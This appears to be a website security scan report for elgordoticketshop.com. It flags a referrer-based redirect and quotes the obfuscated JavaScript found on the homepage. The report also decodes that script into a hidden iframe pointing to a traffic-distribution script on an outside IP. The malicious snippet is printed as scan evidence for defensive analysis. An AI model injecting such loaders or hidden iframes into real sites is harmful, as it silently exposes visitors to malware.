Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://elgordoticketshop.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: elgordoticketshop.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 23:35:27 GMT Location: http://bismarckurbanharvest.org/bismanuu_migrate/misc/ui/images/kee.php Server: WebServerX Content-Length: 330 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://elgordoticketshop.com/ | 200 OK Content-Length: 787 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51865a8c1645e(v51865a8c164ac){ function v51865a8c164f4 () {return 16;} return(parseInt(v51865a8c164ac,v51865a8c164f4()));}function v51865a8c165ad(v51865a8c165ef){ function v51865a8c16698 () {return 2;} var v51865a8c16630='';for(v51865a8c16671=0; v51865a8c16671<v51865a8c165ef.length; v51865a8c16671+=v51865a8c16698()){ v51865a8c16630+=(String.fromCharCode(v51865a8c1645e(v51865a8c165ef.substr(v51865a8c16671, v51865a8c16698()))));}return v51865a8c16630;} document.write(v51865a8c165ad('3C696672616D65206E616D653D2764636639333935666161326527207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D353035206865696768743D333034207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='dcf9395faa2e' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=505 height=304 style='display:none'></iframe> Antivirus reports:
| ||
http://elgordoticketshop.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 23:35:28 GMT Location: http://bismarckurbanharvest.org/bismanuu_migrate/misc/ui/images/kee.php Server: WebServerX Content-Length: 330 Content-Type: text/html; charset=iso-8859-1 | clean |
http://bismarckurbanharvest.org/bismanuu_migrate/misc/ui/images/kee.php | 404 Not Found Content-Length: 7639 Content-Type: text/html | clean |
http://bismarckurbanharvest.org/components/js/modernizr.js | 200 OK Content-Length: 12904 Content-Type: application/x-javascript | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: text/javascript | clean |
http://elgordoticketshop.com/components/js/tao_gallery.js | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 23:35:31 GMT Location: http://bismarckurbanharvest.org/bismanuu_migrate/misc/ui/images/kee.php Server: WebServerX Content-Length: 330 Content-Type: text/html; charset=iso-8859-1 | clean |
http://bismarckurbanharvest.org/test404page.js | 404 Not Found Content-Length: 175 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=elgordoticketshop.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://elgordoticketshop.com/
Result: elgordoticketshop.com is not infected or malware details are not published yet.
Result: elgordoticketshop.com is not infected or malware details are not published yet.